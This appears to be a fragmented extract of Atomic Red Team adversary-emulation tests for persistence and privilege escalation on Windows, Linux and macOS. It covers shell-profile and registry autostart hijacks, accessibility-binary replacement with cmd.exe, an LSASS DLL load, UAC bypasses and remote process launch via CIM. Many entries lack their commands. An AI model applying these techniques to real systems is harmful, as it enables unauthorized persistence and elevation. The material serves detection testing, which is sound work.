mv /tmp/T1546.004 ~/.bash_profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .bashrc
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.bashrc
Description: Adds a command to the .bashrc file of the current user
Cleanup:
# the test appended exactly one line, so strip exactly one
head -n '-1' ~/.bashrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.bashrc
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Add command to .shrc
echo 'echo "Hello from Atomic Red Team T1546.004" > /tmp/T1546.004' >> ~/.shrc
Description: Adds a command to the .shrc file of the current user
Cleanup:
# the test appended exactly one line, so strip exactly one
head -n '-1' ~/.shrc > /tmp/T1546.004
mv /tmp/T1546.004 ~/.shrc
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Append to the system shell profile
echo '# Hello from Atomic Red Team T1546.004' >> /etc/profile
Description: An adversary may wish to establish persistence by executing malicious commands from the system's /etc/profile every time "any" user logs in.
Cleanup:
# delete the line the test appended (the pattern must match the text echoed above)
sed -i '/# Hello from Atomic Red Team T1546.004/d' /etc/profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Append commands user shell profile
echo '# Atomic Red Team was here... T1546.004' >> ~/.profile
Description: An adversary may wish to establish persistence by executing malicious commands from the users ~/.profile every time the "user" logs in.
Cleanup:
sed -i "s/# Atomic Red Team was here... T1546.004//" ~/.profile
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
System shell profile scripts
echo '# Atomic Red Team was here... T1546.004' >> /etc/profile.d/bash_completion.sh
Description: An adversary may wish to establish persistence by adding commands into any of the script files in the /etc/profile.d/ directory, which are executed every time "any" user logs in.
Cleanup:
sed -i "s/# Atomic Red Team was here... T1546.004//" /etc/profile.d/bash_completion.sh
T1546.004 - Event Triggered Execution: .bash_profile .bashrc and .shrc
Create/Append to .bash_logout
useradd --create-home --shell /bin/bash art
su -l art -c "echo 'echo \"Atomic Red Team was here... T1546.004\" >> /home/art/art.txt' >> /home/art/.bash_logout; exit"
Description: The Bash shell runs ~/.bash_logout, if it exists, when the user logs out. An adversary may create or append to a .bash_logout to clear history, start processes, etc. Note that ~/.bash_logout is only run when you explicitly exit or log out of an interactive login shell session, i.e. via the console, SSH, /bin/bash -l or su -l.
This test creates the art user, logs in as art, appends a command to .bash_logout that echoes some text into art.txt, and logs out, at which point /home/art/art.txt is created.
Cleanup:
userdel -fr art
T1546.005 - Event Triggered Execution: Trap
Trap EXIT
bash -c 'trap "nohup sh $T1546.005/src/echo-art-fish.sh" EXIT'
Description: Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
Cleanup:
rm -f /tmp/art-fish.txt
T1546.005 - Event Triggered Execution: Trap
Trap EXIT (freebsd)
bash -c 'trap "nohup sh $T1546.005/src/echo-art-fish.sh" EXIT'
Description: Launch bash shell with command arg to create TRAP on EXIT.
The trap executes script that writes to /tmp/art-fish.txt
Prereq: Check if bash is installed.
if [ ! -x "$(command -v bash)" ]; then exit 1; else exit 0; fi;
Description: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
Description: Launch bash shell with command arg to create TRAP on SIGINT (CTRL+C), then send SIGINT signal.
The trap executes script that writes to /tmp/art-fish.txt
Prereq: Check if bash is installed.
if [ ! -x "$(command -v bash)" ]; then exit 1; else exit 0; fi;
Description: You can register a "helper DLL" with Netsh as a persistence mechanism. The code in the DLL is executed every time netsh.exe is called.
The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run.
[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html)
[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon)
Prereq: Helper DLL must exist on disk at specified location (T1546.007\bin\NetshHelper.dll)
if (Test-Path "T1546.007\bin\NetshHelper.dll") { exit 0} else { exit 1}
Description: Registers cmd.exe as the Image File Execution Options debugger for a list of target processes. Configure your own input arguments to use a different executable or list of executables.
Upon successful execution, PowerShell will modify the registry so that launching osk.exe starts cmd.exe in its place.
Description: Executes code specified in the registry automatically at the start of a new user logon session by registering a new Assistive Technology (AT) entry and modifying its configuration value.
This test will register a new AT named malware_test whose executable is cmd.exe and add a configuration value so that it runs during the user logon session.
Description: Replace utilman.exe (Ease of Access binary) with cmd.exe. This allows the user to launch an elevated command prompt by clicking the Ease of Access button on the login screen.
Description: Replace Magnify.exe (Magnifier binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Magnifier from the Accessibility menu on the login screen.
Description: Replace Narrator.exe (Narrator binary) with cmd.exe. This allows the user to launch an elevated command prompt by toggling on the Narrator button from the Accessibility menu on the login screen.
Description: Replace DisplaySwitch.exe (Display Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt by pressing the Windows Key + P on the login screen.
Description: Replace AtBroker.exe (App Switcher binary) with cmd.exe. This allows the user to launch an elevated command prompt from the login screen by locking and then unlocking the computer after toggling on any of the accessibility tools in the Accessibility menu.
Description: Creates a new 'AtomicTest' value pointing to an AppCert DLL in the AppCertDlls registry key.
Once the computer is restarted, the DLL will be loaded into multiple processes and will write an
'AtomicTest.txt' file in C:\Users\Public\ to validate that the DLL executed successfully.
Reference: https://skanthak.homepage.t-online.de/appcert.html
Prereq: File to copy must exist on disk at specified location (T1546.009\bin\AtomicTest.dll)
if (Test-Path "T1546.009\bin\AtomicTest.dll") {exit 0} else {exit 1}
Description: AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon successful execution,
you will see the message "The operation completed successfully." Each time the DLL is loaded, you will see a message box with the message "Install AppInit Shim DLL was called!" appear.
This will happen regularly as your computer starts various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify that the
AppInit DLLs are loading is to start the Notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.
Note: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls
Prereq: Reg files must exist on disk at specified locations (T1546.010\src\T1546.010.reg and T1546.010\src\T1546.010-cleanup.reg)
Description: Install a shim database. This technique is used for privilege escalation and bypassing user access control.
Upon execution, "Installation of AtomicShim complete." will be displayed. To verify the shim behavior, run
AtomicTest.exe from the T1546.011\bin directory. You should see a message box appear
with "Atomic Shim DLL Test!" as defined in AtomicTest.dll. To better understand what is happening, review
the source code files in the T1546.011\src directory.
Prereq: Shim database file must exist on disk at specified location (T1546.011\bin\AtomicShimx86.sdb)
if (Test-Path "T1546.011\bin\AtomicShimx86.sdb") {exit 0} else {exit 1}
Prereq: AtomicTest.dll must exist at c:\Tools\AtomicTest.dll
if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1}
Description: Upon execution, check the "C:\Windows\apppatch\Custom\" folder for the new shim database
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
Description: Create registry keys in locations where fin7 typically places SDB patches. Upon execution, output will be displayed describing
the registry keys that were created. These keys can also be viewed using the Registry Editor.
https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html
Description: The following Atomic Test will create a GlobalFlag key under Image File Execution Options, also a SilentProcessExit Key with ReportingMode and MonitorProcess values. This test is similar to a recent CanaryToken that will generate an EventCode 3000 in the Application log when a command, whoami.exe for example, is executed.
Upon running Whoami.exe, a command shell will spawn and start calc.exe based on the MonitorProcess value.
Upon successful execution, powershell will modify the registry and spawn calc.exe. An event 3000 will generate in the Application log.
Description: Appends a Start-Process cmdlet to the current user's PowerShell profile that points to a malicious executable. Upon execution, calc.exe will be launched.
Prereq: Ensure a powershell profile exists for the current user
Description: Establish persistence via a rule run by OSX's emond (Event Monitor) daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124
Description: This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
Prereq: DLL For testing
if (Test-Path "..\ExternalPayloads\AtomicTest.dll") {exit 0} else {exit 1}
Description: This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under the InprocServer32 key in the HKCU hive, then calling the Class ID to be executed via "rundll32.exe -localserver [clsid]".
This method is generally used as an alternative to 'rundll32.exe -sta [clsid]' to execute DLLs while evading detection.
Reference: https://www.hexacorn.com/blog/2020/02/13/run-lola-bin-run/
Upon successful execution of this test with the default options, whenever certain apps are opened (for example, Notepad), a calculator window will also be opened.
Prereq: DLL For testing
if (Test-Path "..\ExternalPayloads\T1546.015_calc.dll") {exit 0} else {exit 1}
Description: This test first creates a custom CLSID class pointing to the Windows Script Component runtime DLL. This DLL looks for the ScriptletURL key to get the location of the script to execute.
Then, it hijacks the CLSID for the Work Folders Logon Synchronization to establish persistence on user logon by creating a 'TreatAs' subkey whose default value is the malicious CLSID. The
test is validated by running 'rundll32.exe -sta "AtomicTest"' to avoid logging out.
References:
https://youtu.be/3gz1QmiMhss?t=1251
https://github.com/enigma0x3/windows-operating-system-archaeology
Description: The DLL pointed to by the AutodialDLL registry key is loaded every time a process connects to the internet. Attackers can gain persistent code execution by setting this key to a DLL of their choice.
The sample dll provided, AltWinSock2DLL, will launch the notepad process. Starting and stopping a web browser such as MS Edge or Chrome should result in the dll executing.
[Blog](https://www.mdsec.co.uk/2022/10/autodialdlling-your-way/)
Prereq: AltWinSock2DLL DLL must exist on disk at specified at PathToAtomicsFolder\T1546\bin\AltWinSock2DLL.dll
if (Test-Path T1546\bin\AltWinSock2DLL.dll) { exit 0} else { exit 1}
Description: An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
Description: An adversary may abuse the CommandProcessor AutoRun registry key to persist. Every time cmd.exe is executed, the command defined in the AutoRun key also gets executed.
[reference](https://devblogs.microsoft.com/oldnewthing/20071121-00/?p=24433)
# Open a CIM session to the target over WinRM; host and credential come from the test's input arguments
$CimSession = New-CimSession -ComputerName $ComputerName -Credential $Credential
# Define the process you want to start
$ProcessToStart = "calc.exe"
# Invoke the Create method on the Win32_Process class to start the process
$Result = Invoke-CimMethod -CimSession $CimSession -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine = $ProcessToStart}
# Check the result
if ($Result.ReturnValue -eq 0) {
    Write-Host "Process started successfully with Process ID: $($Result.ProcessId)"
} else {
    Write-Host "Failed to start the process. Error code: $($Result.ReturnValue)"
}
# Clean up the CIM session
Remove-CimSession -CimSession $CimSession
Description: The following Atomic will create a New-CimSession on a remote endpoint and start a process using Invoke-CimMethod.
This is a novel way to perform lateral movement or to start a remote process.
This does require WinRM to be enabled. The account performing the run will also need to be elevated.
A successful execution will print to stdout that the process started. On the remote endpoint, wmiprvse.exe will spawn the given process.
T1546 - Event Triggered Execution
Adding custom debugger for Windows Error Reporting
Description: When an application hangs, the Windows Error Reporting framework can attach a debugger if one is configured in the registry.
Pointing that debugger value at an executable of your choice causes WER to launch it automatically whenever an application hangs.
Description: Adding a ClxDllPath value under the Terminal Server Client subkey of the HKLM hive, with the path to a custom DLL, causes mstsc.exe to load that DLL when it runs.
Cleanup:
reg delete "HKLM\SOFTWARE\Microsoft\Terminal Server Client" /v ClxDllPath /f
T1546 - Event Triggered Execution
Persistence using automatic execution of custom DLL during RDP session
Description: When a remote desktop session is accepted, the system queries the registry key HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\TestDVCPlugin.
If that key exists, the OS reads the Path value underneath it and loads the DLL it points to via LoadLibrary.
Description: Create persistence by triggering the script within ErrorHandler.cmd upon the execution of specific binaries within the oobe directory.
Upon test execution, Setup.exe will be executed, which in turn runs the script within ErrorHandler.cmd to launch Notepad.
Prereq: ErrorHandler.cmd script must exist on disk at the specified location (PathToAtomicsFolder\T1546\src\ErrorHandler.cmd)
if (Test-Path T1546\src\ErrorHandler.cmd) { exit 0} else { exit 1}
Description: When Word starts, it searches for the registry key HKCU\Software\Microsoft\Office\\Word\Options\STARTUP-PATH and if it exists,
it will treat it as a user specific start-up folder and load the contents of the folder with file extensions of .wll,.lnk,.dotm,.dot,.dotx
The registry key can be abused to load malware from the mentioned path. Reboot might be required.
Description: Run Key Persistence
Upon successful execution, cmd.exe will modify the registry by adding "Atomic Red Team" to the Run key. Output will be via stdout.
Cleanup:
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f >nul 2>&1
T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Description: RunOnce Key Persistence.
Upon successful execution, cmd.exe will modify the registry to load AtomicRedTeam.dll to RunOnceEx. Output will be via stdout.
Description: .vbs files can be placed in and run from the Startup folder to maintain persistence. Upon execution, "T1547.001 Hello, World VBS!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: .jse files can be placed in and run from the Startup folder to maintain persistence.
Upon execution, "T1547.001 Hello, World JSE!" will be displayed twice.
Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: .bat files can be placed in and executed from the Startup folder to maintain persistence.
Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
folder and will also run when the computer is restarted and the user logs in.
Description: Adds a non-malicious executable shortcut link to the current user's Startup directory. The test can be verified by going to the user's Startup directory and checking that the shortcut link exists.
Description: Adds persistence via the Recycle Bin [vxunderground](https://github.com/vxunderground/VXUG-Papers/blob/main/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf)
The user has to click on the Recycle Bin to launch the payload (here calc).
Description: This Atomic will create a registry key called socks5_powershell for persistent access
https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c
Description: This test will modify the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Common Startup"
value to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Description: This test will modify the HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders -V "Startup" value
to point to a new startup folder where a payload could be stored to launch at boot. *successful execution requires system restart
Description: This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run to launch calc.exe on boot.
*Requires reboot
Description: This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run key value to launch calc.exe on boot.
*Requires reboot
Description: This test will append a command to the HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit value to launch calc.exe on boot.
* Requires reboot
Description: This test changes the default value of HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell from "explorer.exe" to the full path "C:\Windows\explorer.exe"
to log a change to the key's default value without breaking the boot sequence.
An attacker would instead replace this with a custom shell.
Description: secedit can be used to write to the HKLM hive of the Windows registry. This test creates a Run key value named calc, with calc.exe as its data, in the HKLM hive.
[Reference](https://blueteamops.medium.com/secedit-and-i-know-it-595056dee53d)
Description: This test modifies the BootExecute registry value to "autocheck autoche *", which can be used to simulate an adversary's attempt to tamper with the system's boot process.
Reference - https://www.welivesecurity.com/wp-content/uploads/2018/09/ESET-LoJax.pdf
NOTE that by not saving the correct value, you may inhibit your system from booting properly. Only run on a test system. There is a reg export before running the Atomic.
Description: When a user logs in via RDP, Windows reads the StartupPrograms value under the HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd registry key.
By default the value is rdpclip. An attacker with administrator privileges can change it so that a custom application executes during the RDP logon session. This test makes calc run instead of rdpclip when a user logs in via RDP.
Description: Windows allows a custom boot verification program to be defined by creating the registry key "HKLM\System\CurrentControlSet\Control\BootVerificationProgram" and setting its ImagePath value to the path of the program. A threat actor
can abuse this by creating the key and pointing it at a malicious application, which is then executed after a successful boot.
Description: This atomic test adds persistence via the Windows context menu [Hexacorn](https://www.hexacorn.com/blog/2018/07/29/beyond-good-ol-run-key-part-82/)
The user has to right-click on the desktop or in the white space of an open folder (e.g. Size Modify).
Description: Establishes persistence using a custom authentication package for the Local Security Authority (LSA).
After a reboot, Notepad.exe will be executed as child process of lsass.exe.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.002/package
[Related blog](https://pentestlab.blog/2019/10/21/persistence-security-support-provider/)
Description: Establishes persistence by creating a new time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The new time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
Cleanup:
net stop w32time
reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\AtomicTest" /f
rm -force C:\Users\Public\AtomicTest.dll
net start w32time
Description: Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider.
The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt
in C:\Users\Public\ as validation that the test is successful.
Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/
Description: PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon Notify key to execute a notification package DLL at logon.
Upon successful execution, PowerShell will modify a registry value to execute atomicNotificationPackage.dll upon logon.
Please note that Winlogon Notifications have been removed as of Windows Vista / Windows Server 2008, so this test only applies to earlier versions of Windows.
Description: PowerShell code to set Winlogon shell key to execute a binary at logon along with explorer.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: PowerShell code to set Winlogon userinit key to execute a binary at logon along with userinit.exe.
Upon successful execution, PowerShell will modify a registry value to execute cmd.exe upon logon/logoff.
Description: Add a value to a Windows registry Security Support Provider key pointing to a payload .dll, which will normally need to be copied into the system32 folder.
A common DLL used with this technique is mimilib.dll from mimikatz, see https://pentestlab.blog/2019/10/21/persistence-security-support-provider/
Description: The following Atomic Test will write a file, comadmin.dat, to disk. From the report, Snake's installer drops the kernel driver and a custom DLL which is used to load the driver into a
single AES-encrypted file on disk. Typically, this file is named "comadmin.dat" and is stored in the %windows%\system32\Com directory.
This Atomic Test will write a hardcoded file named comadmin.dat to disk in the Com directory.
[Snake Malware - CISA](https://media.defense.gov/2023/May/09/2003218554/-1/-1/0/JOINT_CSA_HUNTING_RU_INTEL_SNAKE_MALWARE_20230509.PDF)
Description: Mac Defaults
[Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html)
T1547.007 - Boot or Logon Autostart Execution: Re-opened Applications
Append to existing loginwindow for Re-Opened Applications
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then echo "No loginwindow plist file found" && exit 1 ; fi
echo save backup copy to /tmp/
cp ${FILE} /tmp/t1547007_loginwindow-backup.plist
echo before
plutil -p ${FILE}
echo overwriting...
/tmp/t1547007_append_exe ${FILE} && echo after && plutil -p ${FILE}
Description: Appends an entry to the hidden loginwindow.*.plist that launches Calculator on the next login.
Note that the change may not result in the added Calculator program launching on next user login.
It may depend on which version of macOS you are running on.
Prereq: compile C program
if [ -f "/tmp/t1547007_append_exe" ]; then exit 0 ; else exit 1; fi
Cleanup:
rm -f /tmp/t1547007_append_exe
# revert to backup copy
FILE=`find ~/Library/Preferences/ByHost/com.apple.loginwindow.*.plist -type f | head -1`
if [ -z "${FILE}" ] ; then exit 0 ; fi
mv /tmp/t1547007_loginwindow-backup.plist ${FILE}
T1547.008 - Boot or Logon Autostart Execution: LSASS Driver
Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt
Description: The following Atomic will modify an undocumented registry key that may be abused to load an arbitrary DLL into LSASS.
Upon execution, the registry key will be modified and a value will contain the path to the DLL.
Reference: https://blog.xpnsec.com/exploring-mimikatz-part-1/ and source https://github.com/oxfemale/LogonCredentialsSteal
Note that if any LSA based protection is enabled, this will most likely not be successful with LSASS.exe loading the DLL.
Prereq: lsass_lib.dll must exist on disk at specified location (..\ExternalPayloads\lsass_lib.dll)
if (Test-Path "..\ExternalPayloads\lsass_lib.dll") {exit 0} else {exit 1}
Description: This test simulates shortcut modification and then executes the shortcut. Example check for strings in shortcuts (*.lnk, *.url) with PowerShell:
gci -path "C:\Users" -recurse -include *.url -ea SilentlyContinue | Select-String -Pattern "exe" | FL
Upon execution, calc.exe will be launched.
Cleanup:
del -f %temp%\T1547.009_modified_shortcut.url >nul 2>&1
T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification
Description: LNK file to launch CMD placed in startup folder. Upon execution, open File Explorer and browse to "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\"
to view the new shortcut.
Description: Add a key-value pair to a Windows Port Monitor registry key. On the subsequent reboot the DLL will be executed under spoolsv.exe with NT AUTHORITY\SYSTEM privileges.
Description: Establishes persistence by creating a new print processor registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Environments\Windows x64\Print Processors.
The new print processor will point to a DLL which will be loaded by the spooler service after a reboot. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful.
Note: The test assumes an x64 Windows operating system.
The payload source code is based on a blog post by stmxcsr: [https://stmxcsr.com/persistence/print-processor.html](https://stmxcsr.com/persistence/print-processor.html)
Description: This test will create an "atomic_test" key under 'HKLM:\SOFTWARE\Microsoft\Active Setup\Installed Components' to launch calc by configuring an Active Setup executable and
forcing Active Setup to run using the "runonce.exe /AlternateShellStartup" command.
Without the "runonce.exe /AlternateShellStartup" command it would run during the next logon of each user.
Note: If you logout before running the cleanup command, you will be required to go through the OOBE (out-of-box experience) setup sequence to log back in.
The payload will only run once unless the cleanup command is run in between tests.
[Active Setup Explained](https://helgeklein.com/blog/active-setup-explained/)
Description: This test will add a StubPath entry to the native Active Setup registry key associated with 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}).
Said key doesn't have a StubPath value by default; by adding one, calc will be launched by forcing Active Setup to run using runonce.exe /AlternateShellStartup.
Without the last command it will normally run on the next user logon. Note: this test will only run successfully once if no cleanup command is run in between tests.
Description: This test will decrease the version number of the 'Internet Explorer Core Fonts' (UUID {C9E9A340-D1F1-11D0-821E-444553540600}) registry key for the current user,
which will force the StubPath payload (if set) to execute.
T1547.015 - Boot or Logon Autostart Execution: Login Items
T1547.015 - Boot or Logon Autostart Execution: Login Items
Add macOS LoginItem using Applescript
osascript T1547.015/src/add_login_item.osa
Description: Runs osascript on a file to create a new LoginItem for the current user.
NOTE: Will pop up a dialog prompting the user to Allow or Deny Terminal.app to control "System Events".
Therefore, it can't be automated until the TCC permission is granted.
The login item launches Safari.app when user logs in, but there is a cleanup script to remove it as well.
In addition to the `osascript` Process Events, file modification events to
`/Users/*/Library/Application Support/com.apple.backgroundtaskmanagementagent/backgrounditems.btm` should be seen.
Description: Install a driver via pnputil.exe lolbin
T1547 - Boot or Logon Autostart Execution
Driver Installation Using pnputil.exe
pnputil.exe -i -a C:\Windows\INF\acpipmi.inf
Description: pnputil.exe is a native command-line utility in Windows for installing drivers; this can be abused to install malicious drivers. Ref: https://lolbas-project.github.io/lolbas/Binaries/Pnputil/
T1547 - Boot or Logon Autostart Execution
Leverage Virtual Channels to execute custom DLL during successful RDP session
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\Malware" /v Name /t REG_SZ /d "C:\Windows\System32\amsi.dll" /f
Description: Virtual Channels can be leveraged to alter RDP behavior using dedicated Addins. The mechanism is implemented using DLLs which can be executed automatically during an RDP session.
The DLLs are loaded on the host system only after a connection to the remote system is successfully established.
Once the test is run, amsi.dll will be loaded on the host system during a successful RDP session.
Blog: https://learn.microsoft.com/en-us/windows/win32/termserv/terminal-services-virtual-channels?redirectedfrom=MSDN
Cleanup:
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default\Addins\Malware" /f
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Description: This test sets the SetGID flag on a file in FreeBSD.
Cleanup:
rm /tmp/evilBinary
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Make and modify capabilities of a binary
cp T1548.001/src/cap.c /tmp/cap.c
make /tmp/cap
sudo setcap cap_setuid=ep /tmp/cap
/tmp/cap
Description: Build a binary from a C source file and modify its [capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html).
The binary doesn't have to modify the UID, but it is given the capability to arbitrarily change it at any time with `setuid(0)`.
Without being owned by root, the binary can set the UID to 0.
Cleanup:
rm /tmp/cap
rm /tmp/cap.c
T1548.001 - Abuse Elevation Control Mechanism: Setuid and Setgid
Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution command prompt should be launched with administrative privileges.
Description: PowerShell code to bypass User Account Control using Event Viewer and a relevant Windows Registry modification. More information here - https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
Upon execution, a command prompt should be launched with administrative privileges.
Description: Bypasses User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution, "The operation completed successfully." will be shown twice and command prompt will be opened.
Description: PowerShell code to bypass User Account Control using the Windows 10 Features on Demand Helper (fodhelper.exe). Requires Windows 10.
Upon execution command prompt will be opened.
Description: PowerShell code to bypass User Account Control using ComputerDefaults.exe on Windows 10
Upon execution administrative command prompt should open
Description: Creates a fake "trusted directory" and copies a binary to bypass UAC. The UAC bypass may not work on fully patched systems
Upon execution, the directory structure should exist if the system is patched; if unpatched, Microsoft Management Console should launch.
Description: Bypasses User Account Control using a fileless method, registry only.
Upon successful execution, sdclt.exe will spawn cmd.exe to spawn notepad.exe
[Reference - sevagas.com](http://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass)
Adapted from [MITRE ATT&CK Evals](https://github.com/mitre-attack/attack-arsenal/blob/66650cebd33b9a1e180f7b31261da1789cdceb66/adversary_emulation/APT29/CALDERA_DIY/evals/payloads/stepFourteen_bypassUAC.ps1)
Description: Disable User Account Control (UAC) using the built-in tool reg.exe by changing its registry key
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA from 1 to 0
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
Bypass UAC using SilentCleanup task
"T1548.002\src\T1548.002.bat"
Description: Bypass UAC using SilentCleanup task on Windows 8-10 using bat file from https://www.reddit.com/r/hacking/comments/ajtrws/bypassing_highest_uac_level_windows_810/
There is an auto-elevated task called SilentCleanup that runs %windir%\system32\cleanmgr.exe. This can be abused to elevate any file with Administrator privileges without prompting UAC (even at the highest level).
For example, we can set the windir registry key to: "cmd /k REM "
And forcefully run SilentCleanup task:
schtasks /run /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I
REM will tell it to ignore everything after %windir% and treat it just as a NOTE. Therefore just executing cmd with admin privs.
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 23
"..\ExternalPayloads\uacme\23 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: Leo Davidson derivative
Type: Dll Hijack
Method: IFileOperation
Target: \system32\pkgmgr.exe
Component: DismCore.dll
Implementation: ucmDismMethod
UCM Method: UacMethodDISM
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\23 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 31
"..\ExternalPayloads\uacme\31 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: Enigma0x3
Type: Shell API
Method: Registry key manipulation
Target: \system32\sdclt.exe
Component: Attacker defined
Implementation: ucmSdcltIsolatedCommandMethod
UCM Method: UacMethodShellSdclt
https://github.com/hfiref0x/UACME
Prereq: UACME executable must exist on disk at specified location ("..\ExternalPayloads\uacme\31 Akagi64.exe")
T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control
UACME Bypass Method 33
"..\ExternalPayloads\uacme\33 Akagi64.exe"
Description: Executes User Account Control Bypass according to the methods listed below. Upon successful execution you should see event viewer load and two administrative command prompts.
Note: The cleanup commands, which kill the spawned cmd and event viewer processes, only work if run as admin.
Author: winscripting.blog
Type: Shell API
Method: Registry key manipulation
Target: \system32\fodhelper.exe
Component: Attacker defined
Implementation: ucmShellRegModMethod
UCM Method: UacMethodMsSettings2
